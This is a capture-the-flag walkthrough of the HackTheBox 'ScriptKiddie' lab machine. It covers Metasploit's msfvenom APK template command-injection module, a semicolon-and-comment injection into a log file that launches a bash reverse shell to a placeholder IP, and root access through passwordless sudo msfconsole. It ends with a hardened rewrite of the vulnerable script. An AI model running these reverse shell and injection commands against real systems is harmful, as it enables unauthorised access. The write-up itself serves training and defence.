HackTheBox: (“ScriptKiddie”) — Walkthrough
Hi People :D
Today we're going to solve the “ScriptKiddie” machine from HackTheBox, let’s go :D
TL;DR
— — —
- Ports 5000 and 22 are opened.
- Navigate to the website on port 5000: it contains three functions, one of them being payload creation with msfvenom.
- We can upload a template file in the payload creation function; I found a Metasploit module that exploits a command injection vulnerability in this function.
- Using this module, I created the exploit APK and uploaded it, which gave me a shell as the kid user; the user flag is in the kid user's home directory.
- In the /home/pwn directory there’s a bash script called scanlosers.sh, which reads another file called hackers and applies some filtering that we need to bypass to get a shell as the pwn user.
- After reading the script, I found the right bypass, used it to execute a bash reverse shell through the hackers file, and got a pwn user shell.
- From the pwn user shell we can run msfconsole as root without a password, and we can use msfconsole to read the root flag from /root/root.txt.
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.226
We have two open ports (22 and 5000), so let’s navigate to the website on port 5000.
Web Enumeration
— — — — — — — —
We have a website on port 5000 with a few functions (port scan with Nmap, payload creation with msfvenom, and searchsploit).
I tried to brute-force directories and also tried to trigger command injection in the Nmap function and the searchsploit function, but without success ☹.
The remaining function is payload creation with msfvenom; the interesting thing about this function is that we can upload a template file.
At the time, I didn’t know what a template file was, so I searched for any available exploit; fortunately, there’s a Metasploit module that triggers RCE in this function.
Exploitation
— — — — — —
Let’s try this module: first we select the module, then set LHOST to your HTB VPN IP (tun0) and run the exploit command to build the exploit APK. Here are the commands:
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
set LHOST tun0
set LPORT 4444
exploit
We successfully made an exploit APK to get a shell, now we only need to start a Netcat listener then upload our crafted APK.
User Flag
— — — — —
Choose the Android OS, put any LHOST (like 10.10.10.10), then choose your APK file (msf.apk by default) and click the generate button. You’ll get a shell as the kid user and will find the user flag in the /home/kid/user.txt file ☺.
Root Flag
— — — — —
We can’t execute the sudo -l command, so let’s do some file enumeration.
Move to the /home/pwn directory; there’s a bash script called scanlosers.sh.
This script reads another file called hackers, then runs the cut command with the -d argument (which takes a delimiter) and the -f argument (which takes a field number), then runs a while/do loop that executes an Nmap command for each entry and redirects the output to /dev/null to discard it.
So we need to get past these filters. First, we get past the cut command by adding two spaces followed by a semicolon, then put our reverse shell command followed by # so that the rest of the line (including the redirection to /dev/null) is treated as a comment.
The final command will be like that:
;/bin/bash -c 'bash -i >& /dev/tcp/{Your_IP}/4444 0>&1' #
Start a Netcat listener and put this command in the hackers file with the echo command:
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/{Your_IP}/4444 0>&1' #" >> hackers
And we successfully get a pwn user shell ☺.
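From the defensive side, the root cause is that a field cut from a file the kid user can write to is spliced straight into a shell command. The following is an added example (not the box's actual scanlosers.sh) of the same log-reading loop rebuilt so that a line in the hackers file can only ever be data; the field number 3 and the sample log lines are assumptions made for this demo, and printf stands in for nmap.

```shell
#!/bin/sh
# Added example, not the box's actual scanlosers.sh: a log-reading loop of
# the kind the walkthrough describes, rebuilt so that a line in the
# "hackers" file can only ever be data. FIELD is an assumption for the demo.
FIELD=3   # assumed: the cut -f field that holds the target address

# Strict IPv4 check: exactly four dot-separated decimal octets, each <= 255.
# Anything else in the field (spaces, ';', '#', quotes) makes it fail.
is_ipv4() {
    addr=$1
    case "$addr" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $addr
    IFS=$oldifs
    [ "$#" -eq 4 ] || return 1
    for o in "$@"; do
        [ "${#o}" -le 3 ] && [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Hardened per-target action: the address is one argv element and never
# passes through "sh -c", so shell metacharacters in it are inert.
# (printf stands in for nmap so the example runs anywhere.)
scan_target() {
    printf 'scan %s\n' "$1"
}

# Read the log the way the original loop does (cut on spaces, one field
# onward), but validate every field: good ones are scanned, bad ones are
# reported on stderr for alerting instead of being handed to a shell.
process_log() {
    while IFS= read -r line; do
        field=$(printf '%s\n' "$line" | cut -d' ' -f"$FIELD"-)
        if is_ipv4 "$field"; then
            scan_target "$field"
        else
            printf 'rejected suspicious log field: %s\n' "$field" >&2
        fi
    done < "$1"
}
```

The rejected-line message on stderr is also a useful detection signal: a line in the hackers file that is not an address is exactly the tampering this box relies on.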
Now try the sudo -l command again as the pwn user: we can run msfconsole as root without a password.
We can use msfconsole as a normal bash shell, which means we can read the root flag from /root/root.txt with a normal cat command inside msfconsole, because msfconsole is running as root and therefore has access to the root directory.
Thanks for reading, and I hope you enjoyed this writeup ❤.
You can give me a Respect on my HackTheBox account (if you want :D).